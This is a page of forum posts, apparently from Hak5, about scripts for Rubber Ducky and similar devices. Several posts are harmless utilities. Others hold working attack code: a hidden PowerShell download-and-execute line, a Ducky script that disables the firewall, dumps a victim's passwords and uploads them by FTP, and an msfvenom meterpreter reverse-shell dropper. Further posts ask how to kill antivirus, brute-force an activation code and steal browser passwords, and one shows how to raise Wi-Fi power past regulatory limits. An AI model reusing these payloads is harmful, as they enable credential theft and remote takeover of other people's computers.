Showing results for tags 'Script'.

  1. Hi, after the latest update of ChromeOS on our Chromebooks I can't get around "Google terms of service". Earlier (OS 84 and earlier) it was only TAB and ENTER. Is it possible to use PAUSE and wait for the user to interact, or does someone have a solution to my problem? Model of CB: HP Chromebook 14 G6 and ChromeOS version 85.0.4183.84, which I use a USB to update before install with Rubber Ducky.
  2. Hey guys and gals. I need to crack a password for a very, very old piece of software (it's over 20 years old at this stage and the dev is no longer supporting it). Pretty sure it was developed on Windows 98. The software gets activated with a 6 digit number. The app's way around brute force is to shut down the app after every failed attempt. This is the code I need to loop... 1 million times (with the second string increasing by 1 digit every time) 😂. GUI r DELAY 100 STRING C:\app\software\app.exe ENTER DELAY 1000 STRING 000001 ENTER ENTER What would be the fastest way for me to write the increasing 6 digit number (6th line of the code) into a script? Currently I have an Excel file open with column A populated with increasing numbers (cell A1=000000, A2=000001 etc). I can write the script to copy from the Excel list after every attempt, but would there be a more efficient way to code the numbers directly into the Ducky Script to increase the speed of the brute force? Short of that, could you advise of some brute force software on Windows that can follow the above script's flow, since the app shuts down after every failed attempt and needs to be re-launched again.
  3. Battery Tester/CPU Stress for the Shark Jack. I keep seeing people talk about how the battery lasts less than 10 minutes, etc. etc. etc.. I made a script to test and prove the battery drains incredibly fast under load. Furthermore... The Script.. (NOTE: This script should be run on the Shark Jack itself!)

     battery-tester.sh

     #!/bin/bash
     # Title       : Battery Tester/CPU Stress
     # Author      : REDD of Private-Locker
     # Version     : 1.1
     # Description : The script uses a simple log system to pull the
     #               battery's status, date, and time into a log file for Hak5
     #               to help diagnose the issues. Also uses "sha256sum" to verify
     #               a null file, leaving it to stress the CPU.
     #
     # Log File    : /root/battery.log

     # Set to YES to stress the CPU during Battery Test.
     MAX_LOAD=YES
     STRESS="sha256sum"

     # Time in seconds to report in log. (20 mins = 1200)
     TIME=600

     # Initial Script Variables - DO NOT CHANGE
     UNDER_LOAD=0
     DATE_NOW=$(date +'%r')
     START_TIME=$(date)
     CPU_USAGE=$(grep 'cpu ' /proc/stat | awk '{usage=($2+$4)*100/($2+$4+$5)} END {print usage "%"}')
     # BATTERY is the Shark Jack's built-in battery status command.
     BATTERY_STATUS=$(BATTERY)
     LOG_FILE="/root/battery.log"

     function DISPLAY_TIME () {
         MINS=$((TIME / 60))
         SECS=$((TIME % 60))
         if [ "$TIME" -ge "60" ]; then
             printf "$MINS minutes and $SECS seconds"
         else
             printf "$SECS seconds"
         fi
     }

     TOTAL_TIME=$(DISPLAY_TIME "$TIME")

     if [ ! -f "$LOG_FILE" ]; then
         touch "$LOG_FILE"
     fi

     if [ -f "$LOG_FILE" ]; then
         echo -e "" >> "$LOG_FILE"
         echo -e " Battery Test Date: $START_TIME" >> "$LOG_FILE"
         echo -e "==================================================" >> "$LOG_FILE"
         echo -e "" >> "$LOG_FILE"
         echo -e ""
         echo -e " Battery Test Date: $START_TIME"
         echo -e "\n Battery Test running for $TOTAL_TIME."
         echo -e " Battery Test running for $TOTAL_TIME." >> "$LOG_FILE"
         echo -e " Battery Status: $BATTERY_STATUS"
         echo -e " Battery Status: $BATTERY_STATUS" >> "$LOG_FILE"
         echo -e ""
         if [ "$MAX_LOAD" == "YES" ]; then
             echo -e "\n\n -> LOAD created by $STRESS."
             echo -e " -> LOAD created by $STRESS." >> "$LOG_FILE"
             echo -e "" >> "$LOG_FILE"
             echo -e "==================================================" >> "$LOG_FILE"
             echo -e "" >> "$LOG_FILE"
         fi
         echo -e "" >> "$LOG_FILE"
     fi

     echo -e "[${DATE_NOW}] -> LOAD: $MAX_LOAD - CPU Load: ${CPU_USAGE} [Battery Status: ${BATTERY_STATUS}]" >> "$LOG_FILE"

     for ((i=0; i<=TIME; i++)); do
         if [ "$MAX_LOAD" == "YES" ]; then
             if [ "$UNDER_LOAD" == "0" ]; then
                 UNDER_LOAD=1
                 # Hash an endless stream of zeros in the background to load the CPU.
                 $STRESS /dev/zero &
             fi
         fi
         DATE_NOW=$(date +'%r')
         CPU_USAGE=$(grep 'cpu ' /proc/stat | awk '{usage=($2+$4)*100/($2+$4+$5)} END {print usage "%"}')
         BATTERY_STATUS=$(BATTERY)
         # Arguments are quoted so the space in "01:47:30 PM" is not split into two fields.
         printf "[%s] -> LOAD: %s - CPU Load: %s [Battery Status: %s]\r" "$DATE_NOW" "$MAX_LOAD" "$CPU_USAGE" "$BATTERY_STATUS"
         echo -e "[${DATE_NOW}] -> LOAD: $MAX_LOAD - CPU Load: ${CPU_USAGE} [Battery Status: ${BATTERY_STATUS}]" >> "$LOG_FILE"
         sleep 1
     done

     if [ "$UNDER_LOAD" == "1" ]; then
         killall -9 $STRESS
     fi

     echo -e "" >> "$LOG_FILE"
     echo -e "==================================================" >> "$LOG_FILE"
     echo -e "" >> "$LOG_FILE"

     # Blank line for running in Terminal.
     printf " \n"
     printf "Finished.\n"

     Output Example:

      Battery Test Date: Tue Jan 28 13:47:30 UTC 2020
     ==================================================

      Battery Test running for 10 seconds.
      Battery Status: full

     [01:47:30 PM] -> LOAD: NO - CPU Load: 18.0325% [Battery Status: full]
     [01:47:30 PM] -> LOAD: NO - CPU Load: 18.0437% [Battery Status: full]
     [01:47:31 PM] -> LOAD: NO - CPU Load: 18.0428% [Battery Status: full]
     [01:47:32 PM] -> LOAD: NO - CPU Load: 18.0432% [Battery Status: full]
     [01:47:33 PM] -> LOAD: NO - CPU Load: 18.0469% [Battery Status: full]
     [01:47:34 PM] -> LOAD: NO - CPU Load: 18.0515% [Battery Status: full]
     [01:47:35 PM] -> LOAD: NO - CPU Load: 18.0556% [Battery Status: full]
     [01:47:37 PM] -> LOAD: NO - CPU Load: 18.0596% [Battery Status: full]
     [01:47:38 PM] -> LOAD: NO - CPU Load: 18.0641% [Battery Status: full]
     [01:47:39 PM] -> LOAD: NO - CPU Load: 18.0678% [Battery Status: full]
     [01:47:40 PM] -> LOAD: NO - CPU Load: 18.0718% [Battery Status: full]
     [01:47:41 PM] -> LOAD: NO - CPU Load: 18.0759% [Battery Status: full]

     ==================================================

     I really hope this helps everyone else in their troubles in finding out if their battery is just defective or if it's just being "under load" that makes it so short.
  4. I've had two Bash Bunny payloads fail on me (USB_File_Exfiltration and SmartFileExtract_Exfiltration) when I ran them in the morning, after working on them for a full day trying to get them to work (the night before). Debugging the scripts on Windows, I found out that the date/time stamp formatting for the filename was causing the issue. The hour is left-padded with a space in the AM. I found the following hint for creating Windows batch script variables that are properly formatted with the date/time. My modified code to match the format in the payload scripts is below:

     @echo off
     for /f "tokens=2 delims==" %%a in ('wmic OS Get localdatetime /value') do set "dt=%%a"
     set "YY=%dt:~2,2%" & set "YYYY=%dt:~0,4%" & set "MM=%dt:~4,2%" & set "DD=%dt:~6,2%"
     set "HH=%dt:~8,2%" & set "Min=%dt:~10,2%" & set "Sec=%dt:~12,2%"
     set "datestamp=%YYYY%%MM%%DD%" & set "timestamp=%HH%%Min%%Sec%" & set "fullstamp=%YYYY%%MM%%DD%_%HH%%Min%%Sec%"
     echo datestamp: "%datestamp%"
     echo timestamp: "%timestamp%"
     echo fullstamp: "%fullstamp%"
     pause

     Here is the output:

     datestamp: "20190809"
     timestamp: "084546"
     fullstamp: "20190809_084546"
     Press any key to continue . . .

     And here is the link that helped me figure it out: How do I get current datetime on the Windows command line, in a suitable format for using in a filename? I hope this helps someone avoid the struggle I've been having the last two days.
  5. Can you make videos on automation in non-rooted Android smartphones remotely? We know we can write a bash/shell script and send it to someone remotely via a link; if he/she clicks on the link, the script will automatically execute. Can we do the same on a non-rooted Android smartphone too? For instance, can we send a link to someone with a non-rooted Android smartphone, and if he/she clicks on the link, automatically his/her email account will open, automatically a message will be written in the email and it will be sent automatically. Is it possible? I think it is the same as Rubber Ducky.
  6. Hey guys, my name is Patrick. I'm new in the hacking world, I'm learning. I have a question, I'm trying to download and execute a payload in my Rubber Ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  8. Hey there Hak5 community and fellow Rubber Ducky users! I'm a MacOS user and a beginner when it comes to coding, but I came up with a little bash script to help speed up the encoding process. It's nothing fancy. When I was writing a payload and having to encode then replace the file on the microSD and all that - it was getting a bit tedious. I call it duck_it. It basically takes your scripts as .txt files, encodes them, and transfers them to your microSD card and ejects the card. https://github.com/dot-iso/duck_it I'm new to Bash and GitHub, so there may be some n00b stuff. I'm sure there's a lot of room for improvement
  9. Hoi! So, I've decided to post a script that I've been using for many years. What it does is lock a folder with a specified password, allowing you to hide and unhide a folder from view any time you please. Keep in mind the code isn't entirely mine - it's an upgraded version of a script I found on the internet many years ago. The method of hiding the folder can be seen through if the intruder suspects that there is something hidden there. If a hacker or pentester suspected that there was a hidden file they could find it fairly easily, and I'll tell you how later on in this post. However, if anyone else approached your computer and looked at the files they probably wouldn't look twice. I mean, would you? I don't, unless I suspect.. So, here's the code (why can't we have spoiler tags..):

     @echo off
     color 0a

     :LOAD
     cls
     if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto MAIN
     if NOT EXIST MyStuff goto MFOLDER
     goto MAIN

     :MAIN
     cls
     echo [ FolderLocker V3 ]
     echo.
     echo 1 - LOCK FOLDER
     echo 2 - UNLOCK FOLDER
     echo 3 - EXIT
     echo.
     set /p Choice=Choice:
     REM Comparisons are quoted so an empty answer does not abort the script with a syntax error.
     if "%Choice%" == "1" goto CONFIRMLOCK
     if "%Choice%" == "2" goto UNLOCK
     if "%Choice%" == "3" goto EXIT
     goto MAIN

     :LOCK
     ren "MyStuff" "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
     attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
     echo Folder 'MyStuff' has been locked.
     timeout /t 1 >NUL
     goto MAIN

     :CONFIRMLOCK
     cls
     echo [ FolderLocker V3 ]
     echo.
     echo Lock Folder 'MyStuff'? (Y/N)
     set /p Choice=Choice:
     if "%Choice%" == "Y" goto LOCK
     if "%Choice%" == "y" goto LOCK
     if "%Choice%" == "N" goto MAIN
     if "%Choice%" == "n" goto MAIN
     echo Invalid choice.
     timeout /t 1 >NUL
     goto MAIN

     :UNLOCK
     cls
     echo [ FolderLocker V3 ]
     echo.
     echo Folder's Password:
     set /p Password=Password:
     if NOT "%Password%" == "password" goto EXIT
     attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
     ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" "MyStuff"
     echo Folder 'MyStuff' has been unlocked.
     timeout /t 1 >NUL
     goto MAIN

     :MFOLDER
     cls
     echo [ FolderLocker V3 ]
     echo.
     md MyStuff
     echo Folder 'MyStuff' has been created.
     timeout /t 1 >NUL
     goto MAIN

     :EXIT

     To change the password, just put your password in the :UNLOCK function, 6th line down from the line ":UNLOCK". You can also configure the commands so that it can unlock/lock a file in another directory, making it harder for a random person to know where the folder is, and greatly reducing the chances of someone suspecting a hidden folder (come on, a batch/exe file sitting there saying "FolderLockerV3" isn't going to spark some suspicion?). The folder to be locked is called 'MyStuff', for those who can't understand batch overly well. Anyway, as you may have deduced, the method of hiding the file is very simple. It adds the hidden tag to the file (obviously), but then makes Windows think it's a protected OS file (specifically, a Control Panel file). To view the file when it's hidden, you can click on the 'Options' button under 'View' in Windows Explorer and then click on 'Change folder and search options', then go to the 'View' tab, click on 'Show hidden files, folders and drives', scroll down a little more and then untick 'Hide protected operating system files'. Click on 'Apply' and 'OK', then you should see the Control Panel folder with all its contents. So you can see it's not overly secure, but it's not obvious to those who don't know how it's secured. Now that I've told you it seems easy, right? If you didn't know you might be hard pressed to find out, assuming the owner of the folder converted the batch into an executable or something else that hides plain text. Anyway, enjoy and let me know if you have any other improvements or changes you want to (or are even going to) make to this code! I would love to know your ideas.
  10. Hey All, I am trying to create a bin file with some nircmd commands and I keep getting errors on it. Can anyone advise me on how I am being an idiot. Thanks NW
  11. Hi all, I am creating some shell scripts that occasionally need to use an external Alfa WiFi card, but not all of the time. Rather than leaving the Alfa card enabled constantly, I would like the script to bring the card online when it is required, and switch it back off when it is not. I have read various methods to do this online, but none seem definitive, so I would like to ask which method I should use. So far, I have seen suggestions of:
      - Using WLAN# up and WLAN# down
      - Disabling USB ports using Hub-CTRL
      - Using hardware add-ons
      - This or this (unknown what is being done here)
      - Even people saying it's not possible.
      What would you suggest? Has anyone else had any luck with switching off and back on an Alfa WiFi card from a Linux command line/script? I haven't yet played around, as I'm not at home, but I don't want to waste my time trying a method that won't work as well as something else. Thank you.
  12. Hello everyone. I've flashed my Ducky to a Twin Ducky, hence I put on software (portable) with command-line options. My goal is to successfully plug it into a standby computer and actually make it work, make it execute. But the huge problem is the anti-virus (Norton Small Business Edition). This AV keeps removing all the files and is really a pain in the ass. I was wondering if there was a way to, once plugged in, let the Ducky (temporarily) kill the anti-virus, just so it doesn't have any scanning on, so it will not detect the file, and once everything is back up me and the Ducky will be gone. I have the advantage because one, it's Windows 7 and the accounts that are being logged onto are administrator-privileged, so pressing Yes or No with the Ducky will not be a problem. I really need help. 1. Plug in the Ducky 2. Payloads activate; kills anti-virus (short while just so files can get through) 3. Run the file (command-line). Be out. I just need to learn how to kill the AV. For Norton Small Business Edition it's pretty complex to just disable it straight from the Control Panel. Thanks so much. -Mathew
  13. Hi all, I'm a newbie to Hak5 Forums, so if this thread is in the wrong category, it would be great if the admins could move it to the correct category. Most of you are probably using 'BO' as the region for 'iw' on Linux. This allows the WiFi interface to operate at 30dBm (1 Watt) at max. However, if you're like me and have a device that is capable of transmitting over 1W (I have an Alfa Network AWUS036NH - 2W), you might be interested in increasing the TX power beyond 30dBm. By default, selecting 'BO' as the region only allows the device to operate at a maximum of 30dBm. I tested this on my Raspberry Pi 3, Model B running Kali Linux (with the kali-linux-full metapackage).

      *** If you are lazy and don't want to follow the manual steps below, I made two bash scripts that will work on Kali Linux and Ubuntu: https://github.com/hiruna/wifi-txpower-unlocker

      Working directory: /root

      Steps:

      1. Update and upgrade
         apt-get update
         apt-get upgrade

      2. Install dependencies to compile
         apt-get install pkg-config libnl-3-dev libgcrypt11-dev libnl-genl-3-dev build-essential

      3. Download the latest Central Regulatory Domain Agent (CRDA) and Wireless Regulatory Database. I downloaded crda-3.18.tar.xz and wireless-regdb-2017.03.07.tar.xz
         wget https://www.kernel.org/pub/software/network/crda/crda-3.18.tar.xz
         wget https://www.kernel.org/pub/software/network/wireless-regdb/wireless-regdb-2017.03.07.tar.xz

      4. Unzip the downloaded files
         tar xvJf crda-3.18.tar.xz
         tar xvJf wireless-regdb-2017.03.07.tar.xz

      5. Navigate into wireless-regdb-2017.03.07
         cd wireless-regdb-2017.03.07

      6. Open db.txt and locate the region BO section
         nano db.txt

         You will see something like this:

         country BO: DFS-JP
             (2402 - 2482 @ 40), (30)
             (5250 - 5330 @ 80), (30), DFS
             (5735 - 5835 @ 80), (30)

         The number in the second set of brackets (for each frequency) is the txpower. Since I'm using the 2.4GHz band and want a txpower of 2W (~33dBm), I changed the 20 to 33, and saved the file:

         country BO: DFS-JP
             (2402 - 2482 @ 40), (33)
             (5250 - 5330 @ 80), (30), DFS
             (5735 - 5835 @ 80), (30)

         I also noticed that region AU allows 36dBm for 2.4GHz, so you could just continue without modifying the region BO:

         country AU: DFS-ETSI
             (2400 - 2483.5 @ 40), (36)
             (5150 - 5250 @ 80), (23), NO-OUTDOOR, AUTO-BW
             (5250 - 5350 @ 80), (20), NO-OUTDOOR, AUTO-BW, DFS
             (5470 - 5600 @ 80), (27), DFS
             (5650 - 5730 @ 80), (27), DFS
             (5730 - 5850 @ 80), (36)
             (57000 - 66000 @ 2160), (43), NO-OUTDOOR

         However, I checked with Kali Linux (without compiling and changing the regulatory.bin) and it showed that max txpower was only 20dBm:

         country AU: DFS-ETSI
             (2402 - 2482 @ 40), (N/A, 20), (N/A)
             (5170 - 5250 @ 80), (N/A, 17), (N/A), AUTO-BW
             (5250 - 5330 @ 80), (N/A, 24), (0 ms), DFS, AUTO-BW
             (5490 - 5710 @ 160), (N/A, 24), (0 ms), DFS
             (5735 - 5835 @ 80), (N/A, 30), (N/A)

         So I'm assuming Kali Linux is using an old regulatory.bin and legislation in AU has changed.

      7. Compile
         make

      8. Back up your old regulatory.bin file and move the new file into /lib/crda
         mv /lib/crda/regulatory.bin /lib/crda/regulatory.bin.old
         mv regulatory.bin /lib/crda

         As mentioned in https://wireless.wiki.kernel.org/en/developers/regulatory/crda and https://wireless.wiki.kernel.org/en/developers/regulatory/wireless-regdb, we need to include RSA public keys in crda-3.18/pubkeys. I noticed that there are already 2 .pem files in crda-3.18/pubkeys:
         sforshee.key.pub.pem
         linville.key.pub.pem

      9. Copy root.key.pub.pem into crda-3.18/pubkeys. I also copied sforshee.key.pub.pem from wireless-regdb-2017.03.07 as it was newer:
         cp root.key.pub.pem ../crda-3.18/pubkeys/
         cp sforshee.key.pub.pem ../crda-3.18/pubkeys/

         I found that there are two other pubkeys located at /lib/crda:
         -rw-r--r-- 1 root root 451 Jan 18 12:58 benh@debian.org.key.pub.pem
         -rw-r--r-- 1 root root 451 Jan 18 12:58 linville.key.pub.pem
         -rw-r--r-- 1 root root 451 Jan 18 12:58 sforshee.key.pub.pem

         So I copied them too (wasn't too sure whether I needed to copy them):
         cp /lib/crda/pubkeys/benh\@debian.org.key.pub.pem ../crda-3.18/pubkeys/
         cp /lib/crda/pubkeys/linville.key.pub.pem ../crda-3.18/pubkeys/

      10. Navigate into crda-3.18 and open the Makefile
          cd ../crda-3.18
          nano Makefile

          In Kali Linux, crda is located at /lib/crda instead of /usr/bin/crda, so in the file change the 3rd line REG_BIN?=/usr/lib/crda/regulatory.bin to REG_BIN?=/lib/crda/regulatory.bin:
          REG_BIN?=/lib/crda/regulatory.bin

      11. In the Makefile, find the line CFLAGS += -std=gnu99 -Wall -Werror -pedantic and remove the -Werror option (I couldn't compile without changing it as it treats warnings as errors):
          CFLAGS += -std=gnu99 -Wall -pedantic

      12. Compile
          make clean
          make
          make install

          That's it! I rebooted my Raspberry Pi after compiling.
          reboot

      13. Now let's change the region and set the txpower to 33dBm:
          ifconfig wlan1 down
          iw reg set BO
          iwconfig wlan1 txpower 33
          ifconfig wlan1 up
  14. At first: I´m sorry for my bad English, I´m only 14 and german ^^ So I just wrote this Rubber Ducky Script that downloads a .exe and a .bat from my FTP Server. Then it executes the .exe with the .bat file what creates a .txt file with all the passwords of the victim (of course me when I forgot my passwords :P). Then it deletes the .exe and .bat and uploads the .txt back to my server (it gets deleted after that, too.). Here´s the script: DELAY 1000 REM REM start cmd REM REM GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 STRING Alt j DELAY 1000 REM REM REM disable firewall REM REM STRING netsh advfirewall set currentprofile state off ENTER DELAY 500 REM color unreadable REM STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM REM REM download FTP REM STRING ftp myftpserver.com ENTER DELAY 1000 STRING username ENTER DELAY 1000 STRING password ENTER DELAY 500 STRING lcd C:\ ENTER DELAY 100 STRING binary ENTER DELAY 100 STRING GET i.exe ENTER DELAY 8000 STRING lcd C:\ ENTER DELAY 100 STRING binary ENTER DELAY 100 STRING GET r.bat ENTER DELAY 800 STRING by ENTER DELAY 500 REM REM REM PASSWORD STEAL REM REM REM STRING cd C:\ ENTER DELAY 500 STRING r.bat ENTER DELAY 10000 STRING del r.bat ENTER DELAY 500 STRING del i.exe ENTER REM REM REM REM UPLOAD REM REM REM REM DELAY 500 STRING ftp myftpserver.com ENTER DELAY 1000 STRING username ENTER DELAY 1000 STRING password ENTER DELAY 1000 STRING lcd c:\ ENTER DELAY 100 STRING ascii ENTER DELAY 100 DELAY 800 STRING put p.txt ENTER DELAY 500 STRING bye ENTER DELAY 300 STRING del c:\p.txt ENTER DELAY 200 STRING netsh advfirewall set currentprofile state on ENTER I´m right now working on decreasing the delays, but the download and upload delays are hard to time because it obviously depends on the internet speed the victim has. 
 My ideas to improve this script: Leave the first FTP window open so I don't need to log in again (Cons: 1. I could get thrown out of the session after some time 2. I probably wouldn't be able to switch with ALT + TAB because I don't know what other windows the victim has open). My question: Does this leave something like a log file? So that the victim could trace me back? If so, where would it be located? Do you guys have some suggestions? I would love to hear them :D Disclaimer: I can't put the .exe on my Rubber Ducky using the Twin Duck method because I am using the MalDuino from Seytonic (basically a cheap Rubber Ducky) which cannot be used as a Twin Duck. Thanks for your answers, contrix_ Edit: This is the batch file: i /stext p.txt Disclaimer 2: Everything works fine without any problems.
  15. Hey all, I'm interested in compiling Ducky Script to c++ that will run on an arduino. I would like to take ducky scripts such as the Wallpaper prank, and be able to easily put it on an arduino without having to modify any code myself. Why use an arduino? I have a lot of them, and I would like to take advantage of them. While I did manually write the code for the wallpaper prank in c++ last night, I would like the process to be streamlined by a compiler. I've done some research already and have tried out a few compilers that people have made, such as the Duckuino compiler, but the ones I've found are buggy and throw errors when the arduino IDE is compiling the c++ produced by the Ducky Script compiler. My question is, does anyone know of a working compiler that will take Ducky Script and push it to valid arduino code; or should I just fix the bugs in the Duckuino repo? Let me know if you need more info, or if I'm unclear anywhere. Thanks!
  16. Hey, I ordered the beautiful USB Rubber Ducky and it's working flawlessly. On Windows it's easy as copy-pasterino seeing how ducktoolkit is crazy good. I have one wish though, and seeing how that's possible on Windows, I don't see why it should be possible on Mac. I want to be able to find a password on a Mac computer, on Safari, Chrome or Firefox, does not matter. The password I am looking for is to a website. Also a quick question, I installed Dropbox and my computer automatically logs in to the Dropbox program, which is great. Just wondering where that password is saved..? Gonna be trying that on this device, and if it does not work I'll try my luck on the WiFi Pineapple NANO, just got it today. :D Thank you guys!
  17. Hi guys, I just bought a USB Rubber Ducky and I have an Arabic computer and I can't run any kind of script. I was questioning if there was a script to change the language of the device using the ALT button and shift button to switch to English and run the script. Sorry for my bad English.
  18. Hello. I am getting the following error when running the reverse shell script: c:\decoder.vbs(2, 179) Microsoft VBScript compilation error: Expected integer constant I tried it on Windows 7 and 10 with the same result. Here is the script I am using: And here is the screen output: Any help would be much appreciated! Thanks in advance.
  19. Salutations Hak5, I'm S0AndS0, a long time watcher (and big fan) of the various shows that have been made available by the Hak5 team. What is shared here may be thought of as a "tricky treat" for the holiday. https://github.com/S0AndS0/Perinoid_Pipes The above project has been documented in detail (because we've heard that the show hosts of Hak5 like that out of project authors) and as of the latest local & remote tests is operating as expected. Simply put, this project facilitates common encryption & decryption options of GnuPG via a named pipe (similar to anonymous pipes `|` but addressable via file path) and a customized listening loop that parses incoming data. Think of it as a *short-cut* for operations involving public key crypto; for example, normal encryption:
      echo "some secret" | gpg -a -e user@email.host >> out.file
      And for comparison, an example of encrypting via the named pipe file:
      echo "some secret" > /var/log/named.pipe
      This allows any service to utilize encryption by way of output redirection; logging daemons, web host logging, and/or your own custom services. So far three usage scenarios have been written, but we're hoping that with this community's help we can write at least two more together; perhaps a guide on using this tool with Rubber Ducky to automatically encrypt data off a target to either a second storage device or to the Ducky itself. Notes for beginners: if you (the reader) are new or unfamiliar with encryption via GnuPG then ya may want to start with the documents in the above code repo that begin with `Gnupg_`. After coming to terms with the options available, check the script's help documentation via the following commands:
      chmod u+x Paranoid_Pipes
      ./Paranoid_Pipes --help
      Use the output from above to modify your next commands; add `--help` at the end to check your settings prior to committing to them. Easy as pie.
      Notes for Moderators: if this has been posted in the wrong section please move it or notify the OP's author to move it to the proper section. This tool has been shared with this community in the hopes that readers will find it useful, but without warranties of any kind.
      Notes for Show Hosts: if you wish to include this tool within a publication then you have permission, prematurely given, to utilize any of the tools found in the above code repository for either your own projects or for featuring the main project itself.
  20. I saw the Rubber Ducky and was VERY interested by it. I do not get how it fully works and would like to ask for a link or basic knowledge of it. I want to buy it, but I am wondering if I did if I could get it to work. Or if it even is what I think it is. What I simply want from it is to place it into a computer and get Google passwords. If anyone can help me with this it would be greatly appreciated. Don't hate on me. I know I am new to this and I'm reading over it and finding it very cringy as well. Thank you
  21. So I have seen people having issues with doing a download of a meterpreter payload and getting it to run from the ducky. I went for a different approach. I decided to try to modify this script from the wiki (i think darren did a segment on it) in a different way. Here is what I came up with. Create the exe from msfvenom with the parms to connect the the metasploit handler Encode the exe with base64 Edit the encoding to be duckyfied Append the duckyfied encoded exe to met.txt Append last.txt to met.txt Duckyencoder to make the inject.bin Place on ducky sdcard ... win msfvenom -a x86 --platform windows \ -p windows/meterpreter/reverse_tcp \ LHOST=IP_ADDRESS \ LPORT=PORT \ PREPENDMIGRATE=true \ PREPENDMIGRATEPROC=notepad.exe \ ReverseConnectRetries=20 \ -b '\x00' \ -e x86/shikata_ga_nai \ -f exe |\ base64 > bad_exe.txt sed -e 's/^/STRING /' -e '/STRING/ a ENTER' bad_exe.txt >> met.txt cat last.txt >> met.txt java -jar encoder.jar -i met.txt -o inject.bin Contents of met.txt ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING 
binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\bad_exe.txt ENTER Contents of last.txt CTRL z ENTER STRING cscript c:\decoder.vbs c:\bad_exe.txt c:\bad.exe ENTER STRING c:\bad.exe ENTER STRING exit ENTER
  22. Quick question. Why does this not save when var fileLoc is set to a network location, but works fine when I put C:\somewhere?

      <html>
      <head>
      <script language="javascript">
      function WriteToFile(passForm) {
          var fso = new ActiveXObject("Scripting.FileSystemObject");
          var fileLoc = "\\SERVERNAME\Folder 1\Folder 2\data.csv";
          var file = fso.CreateTextFile(fileLoc, true);
          file.writeline(passForm.FirstName.value + ',' + passForm.LastName.value);
          file.Close();
          alert('File created successfully at location: ' + fileLoc);
      }
      </script>
      </head>
      <body>
      <p>create a csv file with following details -</p>
      <form>
      Type your first name: <input type="text" name="FirstName" size="20">
      Type your last name: <input type="text" name="LastName" size="20">
      <input type="button" value="submit" onclick="WriteToFile(this.form)">
      </form>
      </body>
      </html>

      Initial question resolved. Please read below thread for further question/issue. Thanks.
  23. Hi all, Here's a nice script, entirely in a batch file, that:

      Prompts for input of a user's Full Name and Email Address
      Sets their password to a random string of uppercase, lowercase and numerical characters.
      Generates an email to send to them, with their new password.

      Notes:

      Length of the password can be set using the line Set _RNDLength=
      Whether user has to reset their password on logging in can be set with -mustchpwd
      Amend OU= and DC= for your own company's domain.

      @echo off
      :Start
      endlocal
      echo.
      echo This script will reset the password for a user, using their Full Name,
      echo and then generate the email to be sent to them.
      echo.
      echo Passwords are automatically set as 10 digits, using lowercase,
      echo uppercase and numbers.
      echo.
      echo.
      echo.
      set /p "DisplayName= Full Name : %=%"
      echo.
      echo.
      set /p "EmailAddress= Email : %=%"
      cls
      Setlocal EnableDelayedExpansion
      Set _RNDLength=10
      Set _Alphanumeric=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
      REM Work out the length of the alphabet (9 characters at a time, then the remainder)
      Set _Str=%_Alphanumeric%987654321
      :_LenLoop
      IF NOT "%_Str:~18%"=="" SET _Str=%_Str:~9%& SET /A _Len+=9& GOTO :_LenLoop
      SET _tmp=%_Str:~9,1%
      SET /A _Len=_Len+_tmp
      SET _count=0
      SET _RndAlphaNum=
      REM Pick one character of the alphabet per iteration until _RNDLength is reached
      :_loop
      SET /a _count+=1
      SET _RND=%Random%
      SET /A _RND=_RND%%%_Len%
      SET _RndAlphaNum=!_RndAlphaNum!!_Alphanumeric:~%_RND%,1!
      If !_count! lss %_RNDLength% goto _loop
      dsmod user "CN=%DisplayName%,OU=[OU],DC=[DC],DC=co,DC=uk" -pwd !_RndAlphaNum! -mustchpwd no
      REM "IF ERRORLEVEL n" is true when the errorlevel is n OR HIGHER, so "IF ERRORLEVEL 0"
      REM is always true and a failed dsmod would still send the email. Test for 1 instead.
      IF ERRORLEVEL 1 (
        echo.
        echo Failed.
        echo.
        Pause
        GOTO Start
      ) ELSE (
        GOTO SendEmail
      )
      :SendEmail
      start "" "mailto:%EmailAddress%?subject=Password%%20Reset&body=Hello,%%0D%%0A%%0D%%0AYour%%20AD%%20password%%20has%%20been%%20reset%%20to%%20!_RndAlphaNum!%%0D%%0A%%0D%%0AKind Regards,%%0D%%0A%%0D%%0AYour%%20Name"
      cls
      GOTO Start

      Email generated looks like this:

      Hello,

      Your AD password has been reset to kD5Xjfd8A6

      Kind Regards,

      Your Name

      This saves me some time at work when we get loads of emails asking for password resets for AD accounts. Takes 30 seconds instead of a few minutes.
